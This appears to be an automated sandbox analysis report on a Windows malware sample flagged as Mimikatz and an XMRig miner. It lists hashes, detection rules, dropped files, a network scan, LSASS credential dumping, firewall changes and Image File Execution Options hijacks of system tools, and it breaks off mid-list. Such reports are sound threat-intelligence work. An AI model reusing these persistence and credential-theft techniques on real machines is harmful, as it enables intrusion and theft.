Analysis
-
max time kernel
150s -
max time network
157s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
07-01-2025 02:54
Behavioral task
behavioral1
Sample
2025-01-07_6d0ddf752c28b5478dc5cd32311e9b11_hacktools_icedid_mimikatz.exe
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
2025-01-07_6d0ddf752c28b5478dc5cd32311e9b11_hacktools_icedid_mimikatz.exe
Resource
win10v2004-20241007-en
General
-
Target
2025-01-07_6d0ddf752c28b5478dc5cd32311e9b11_hacktools_icedid_mimikatz.exe
-
Size
7.1MB
-
MD5
6d0ddf752c28b5478dc5cd32311e9b11
-
SHA1
2acaa939e8c31dda164e87ccabbcf65b6e77e494
-
SHA256
a81aec0ecacb02afcfb6829fc0260fb5d84c2e55d74422d341296b2ad548f33f
-
SHA512
e570076f0541716b364bd355f10d96a2b5a42618c26b78b9b686bf9258be26653e34135421b0c4c77e06011b40b9bdeec0fe22241bedfa21edb6477bda487f64
-
SSDEEP
196608:5po1mknGzwHdOgEPHd9BbX/nivPlTXTYe:Ygjz0E57/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Mimikatz family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 100 created 2116 100 byuzvnr.exe 37 -
Xmrig family
-
Contacts a large (31215) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 12 IoCs
resource yara_rule behavioral2/memory/2892-175-0x00007FF662380000-0x00007FF6624A0000-memory.dmp xmrig behavioral2/memory/2892-179-0x00007FF662380000-0x00007FF6624A0000-memory.dmp xmrig behavioral2/memory/2892-197-0x00007FF662380000-0x00007FF6624A0000-memory.dmp xmrig behavioral2/memory/2892-213-0x00007FF662380000-0x00007FF6624A0000-memory.dmp xmrig behavioral2/memory/2892-222-0x00007FF662380000-0x00007FF6624A0000-memory.dmp xmrig behavioral2/memory/2892-231-0x00007FF662380000-0x00007FF6624A0000-memory.dmp xmrig behavioral2/memory/2892-242-0x00007FF662380000-0x00007FF6624A0000-memory.dmp xmrig behavioral2/memory/2892-491-0x00007FF662380000-0x00007FF6624A0000-memory.dmp xmrig behavioral2/memory/2892-492-0x00007FF662380000-0x00007FF6624A0000-memory.dmp xmrig behavioral2/memory/2892-494-0x00007FF662380000-0x00007FF6624A0000-memory.dmp xmrig behavioral2/memory/2892-749-0x00007FF662380000-0x00007FF6624A0000-memory.dmp xmrig behavioral2/memory/2892-750-0x00007FF662380000-0x00007FF6624A0000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 3 IoCs
resource yara_rule behavioral2/memory/4928-3-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/files/0x0009000000023bcf-5.dat mimikatz behavioral2/memory/1308-135-0x00007FF767270000-0x00007FF76735E000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts byuzvnr.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe File created C:\Windows\system32\drivers\etc\hosts byuzvnr.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" byuzvnr.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 5112 netsh.exe 2440 netsh.exe -
Executes dropped EXE 27 IoCs
pid Process 3016 byuzvnr.exe 100 byuzvnr.exe 388 wpcap.exe 1468 benegiqll.exe 1308 vfshost.exe 2884 lllgdyunt.exe 4740 xohudmc.exe 4844 meouau.exe 2892 uieubf.exe 3992 lllgdyunt.exe 2920 lllgdyunt.exe 1652 lllgdyunt.exe 1528 lllgdyunt.exe 1532 lllgdyunt.exe 3620 lllgdyunt.exe 3704 lllgdyunt.exe 4456 lllgdyunt.exe 3524 lllgdyunt.exe 1676 lllgdyunt.exe 3936 byuzvnr.exe 3576 lllgdyunt.exe 348 lllgdyunt.exe 3540 lllgdyunt.exe 2212 lllgdyunt.exe 4480 lllgdyunt.exe 3028 ruznevtjd.exe 4648 byuzvnr.exe -
Loads dropped DLL 12 IoCs
pid Process 388 wpcap.exe 388 wpcap.exe 388 wpcap.exe 388 wpcap.exe 388 wpcap.exe 388 wpcap.exe 388 wpcap.exe 388 wpcap.exe 388 wpcap.exe 1468 benegiqll.exe 1468 benegiqll.exe 1468 benegiqll.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 67 ifconfig.me 68 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
description ioc Process File created C:\Windows\system32\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache byuzvnr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData byuzvnr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 byuzvnr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EC98FD874C34E9667158FBB7DEFBD82F byuzvnr.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File created C:\Windows\SysWOW64\meouau.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\meouau.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 byuzvnr.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File created C:\Windows\system32\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft byuzvnr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content byuzvnr.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies byuzvnr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 byuzvnr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EC98FD874C34E9667158FBB7DEFBD82F byuzvnr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE byuzvnr.exe -
resource yara_rule behavioral2/files/0x0007000000023c9f-131.dat upx behavioral2/memory/1308-133-0x00007FF767270000-0x00007FF76735E000-memory.dmp upx behavioral2/memory/1308-135-0x00007FF767270000-0x00007FF76735E000-memory.dmp upx behavioral2/files/0x0007000000023caa-138.dat upx behavioral2/memory/2884-139-0x00007FF7DBF50000-0x00007FF7DBFAB000-memory.dmp upx behavioral2/memory/2884-143-0x00007FF7DBF50000-0x00007FF7DBFAB000-memory.dmp upx behavioral2/files/0x0007000000023ca7-160.dat upx behavioral2/memory/2892-161-0x00007FF662380000-0x00007FF6624A0000-memory.dmp upx behavioral2/memory/3992-168-0x00007FF7DBF50000-0x00007FF7DBFAB000-memory.dmp upx behavioral2/memory/2920-172-0x00007FF7DBF50000-0x00007FF7DBFAB000-memory.dmp upx behavioral2/memory/2892-175-0x00007FF662380000-0x00007FF6624A0000-memory.dmp upx behavioral2/memory/1652-177-0x00007FF7DBF50000-0x00007FF7DBFAB000-memory.dmp upx behavioral2/memory/2892-179-0x00007FF662380000-0x00007FF6624A0000-memory.dmp upx behavioral2/memory/1528-182-0x00007FF7DBF50000-0x00007FF7DBFAB000-memory.dmp upx behavioral2/memory/1532-187-0x00007FF7DBF50000-0x00007FF7DBFAB000-memory.dmp upx behavioral2/memory/3620-191-0x00007FF7DBF50000-0x00007FF7DBFAB000-memory.dmp upx behavioral2/memory/3704-195-0x00007FF7DBF50000-0x00007FF7DBFAB000-memory.dmp upx behavioral2/memory/2892-197-0x00007FF662380000-0x00007FF6624A0000-memory.dmp upx behavioral2/memory/4456-200-0x00007FF7DBF50000-0x00007FF7DBFAB000-memory.dmp upx behavioral2/memory/3524-204-0x00007FF7DBF50000-0x00007FF7DBFAB000-memory.dmp upx behavioral2/memory/1676-208-0x00007FF7DBF50000-0x00007FF7DBFAB000-memory.dmp upx behavioral2/memory/2892-213-0x00007FF662380000-0x00007FF6624A0000-memory.dmp upx behavioral2/memory/3576-216-0x00007FF7DBF50000-0x00007FF7DBFAB000-memory.dmp upx behavioral2/memory/348-220-0x00007FF7DBF50000-0x00007FF7DBFAB000-memory.dmp upx behavioral2/memory/2892-222-0x00007FF662380000-0x00007FF6624A0000-memory.dmp upx behavioral2/memory/3540-225-0x00007FF7DBF50000-0x00007FF7DBFAB000-memory.dmp upx behavioral2/memory/2212-228-0x00007FF7DBF50000-0x00007FF7DBFAB000-memory.dmp upx behavioral2/memory/4480-230-0x00007FF7DBF50000-0x00007FF7DBFAB000-memory.dmp upx behavioral2/memory/2892-231-0x00007FF662380000-0x00007FF6624A0000-memory.dmp upx behavioral2/memory/2892-242-0x00007FF662380000-0x00007FF6624A0000-memory.dmp upx behavioral2/memory/2892-491-0x00007FF662380000-0x00007FF6624A0000-memory.dmp upx behavioral2/memory/2892-492-0x00007FF662380000-0x00007FF6624A0000-memory.dmp upx behavioral2/memory/2892-494-0x00007FF662380000-0x00007FF6624A0000-memory.dmp upx behavioral2/memory/2892-749-0x00007FF662380000-0x00007FF6624A0000-memory.dmp upx behavioral2/memory/2892-750-0x00007FF662380000-0x00007FF6624A0000-memory.dmp upx -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
description ioc Process File created C:\Windows\hgpuenbvt\UnattendGC\specials\svschost.exe byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\schoedcl.xml byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\schoedcl.xml byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\trfo-2.dll byuzvnr.exe File created C:\Windows\hgpuenbvt\lzvztyutv\Packet.dll byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\crli-0.dll byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\ucl.dll byuzvnr.exe File created C:\Windows\klhnlzly\vimpcsvc.xml byuzvnr.exe File created C:\Windows\hgpuenbvt\Corporate\vfshost.exe byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\AppCapture64.dll byuzvnr.exe File opened for modification C:\Windows\klhnlzly\byuzvnr.exe 2025-01-07_6d0ddf752c28b5478dc5cd32311e9b11_hacktools_icedid_mimikatz.exe File created C:\Windows\hgpuenbvt\lzvztyutv\benegiqll.exe byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\trch-1.dll byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\svschost.xml byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\spoolsrv.xml byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\exma-1.dll byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\tibe-2.dll byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\vimpcsvc.xml byuzvnr.exe File opened for modification C:\Windows\hgpuenbvt\lzvztyutv\Packet.dll byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\docmicfg.xml byuzvnr.exe File opened for modification C:\Windows\klhnlzly\vimpcsvc.xml byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\Shellcode.ini byuzvnr.exe File created C:\Windows\hgpuenbvt\lzvztyutv\scan.bat byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\libeay32.dll byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\posh-0.dll byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\xdvl-0.dll byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\schoedcl.exe byuzvnr.exe File opened for modification C:\Windows\klhnlzly\schoedcl.xml byuzvnr.exe File created C:\Windows\hgpuenbvt\lzvztyutv\wpcap.dll byuzvnr.exe File opened for modification C:\Windows\klhnlzly\svschost.xml byuzvnr.exe File created C:\Windows\ime\byuzvnr.exe byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\cnli-1.dll byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\coli-0.dll byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\zlib1.dll byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\spoolsrv.xml byuzvnr.exe File created C:\Windows\klhnlzly\docmicfg.xml byuzvnr.exe File created C:\Windows\klhnlzly\schoedcl.xml byuzvnr.exe File opened for modification C:\Windows\hgpuenbvt\Corporate\log.txt cmd.exe File opened for modification C:\Windows\klhnlzly\docmicfg.xml byuzvnr.exe File created C:\Windows\hgpuenbvt\Corporate\mimilib.dll byuzvnr.exe File created C:\Windows\hgpuenbvt\lzvztyutv\ip.txt byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\tucl-1.dll byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\vimpcsvc.exe byuzvnr.exe File created C:\Windows\klhnlzly\spoolsrv.xml byuzvnr.exe File opened for modification C:\Windows\klhnlzly\spoolsrv.xml byuzvnr.exe File created C:\Windows\hgpuenbvt\upbdrjv\swrpwe.exe byuzvnr.exe File created C:\Windows\hgpuenbvt\lzvztyutv\wpcap.exe byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\libxml2.dll byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\ssleay32.dll byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\docmicfg.exe byuzvnr.exe File created C:\Windows\klhnlzly\svschost.xml byuzvnr.exe File opened for modification C:\Windows\hgpuenbvt\lzvztyutv\Result.txt ruznevtjd.exe File created C:\Windows\klhnlzly\byuzvnr.exe 2025-01-07_6d0ddf752c28b5478dc5cd32311e9b11_hacktools_icedid_mimikatz.exe File created C:\Windows\hgpuenbvt\lzvztyutv\ruznevtjd.exe byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\spoolsrv.exe byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\svschost.xml byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\docmicfg.xml byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\vimpcsvc.xml byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\AppCapture32.dll byuzvnr.exe File created C:\Windows\hgpuenbvt\Corporate\mimidrv.sys byuzvnr.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4704 sc.exe 2444 sc.exe 1220 sc.exe 4620 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language byuzvnr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language meouau.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language benegiqll.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 